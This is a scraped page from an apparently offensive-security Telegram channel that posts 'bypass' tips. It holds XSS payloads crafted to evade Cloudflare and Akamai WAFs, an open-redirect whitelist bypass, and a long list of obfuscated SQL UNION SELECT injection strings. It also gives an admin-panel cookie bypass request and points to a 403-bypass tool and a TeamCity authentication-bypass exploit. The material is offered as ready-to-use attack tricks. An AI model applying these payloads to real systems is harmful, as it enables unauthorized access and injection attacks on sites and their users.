0Day.Today | Learn Exploit | Zero World | Dark web

0Day.Today | Learn Exploit | Zero World | Dark web |

CloudFlare Bypass

<Img Src=OnXSS OnError=alert(1)>

#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army

4.0K views11:14

0Day.Today | Learn Exploit | Zero World | Dark web |

Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "><img src=x onerror=alert(1)> [Blocked By Cloudflare]

⛔

Payload Used : "><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

3.4K views12:46

0Day.Today | Learn Exploit | Zero World | Dark web |

NoMore403

Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites:
Before you install and run nomore403, make sure you have the following:

Go 1.15 or higher installed on your machine

Installation:

cd nomore403
go get
go build

Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage:

./nomore403 -h

Github

⬇️ Download
🔒 LearnExploit

#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

3.1K views06:40

0Day.Today | Learn Exploit | Zero World | Dark web |

Bypass open redirection whitelisted using chinese dots:

%E3%80%82

Tip: Keep eyes on SSO redirects

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

2.8K views11:39

0Day.Today | Learn Exploit | Zero World | Dark web |

Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

2.9K viewsedited 10:45

0Day.Today | Learn Exploit | Zero World | Dark web |

Bypass SQL union select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

2.7K views21:33

0Day.Today | Learn Exploit | Zero World | Dark web |

bypass XSS Cloudflare WAF

Encoded Payload:

"><track/onerror='confirm\%601\%60'>

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> "
> --> >
< --> <
' --> '
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army

2.7K viewsedited 10:47

0Day.Today | Learn Exploit | Zero World | Dark web |

find an admin panel bypass using (admin=1).

/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value) --> Set-Cookie:admin=;

Bypass request:

GET /admin HTTP/1.1
Cookie:admin=1;

#Trick #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

2.6K views10:22

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

2.6K views13:30

About

Blog

Apps

Platform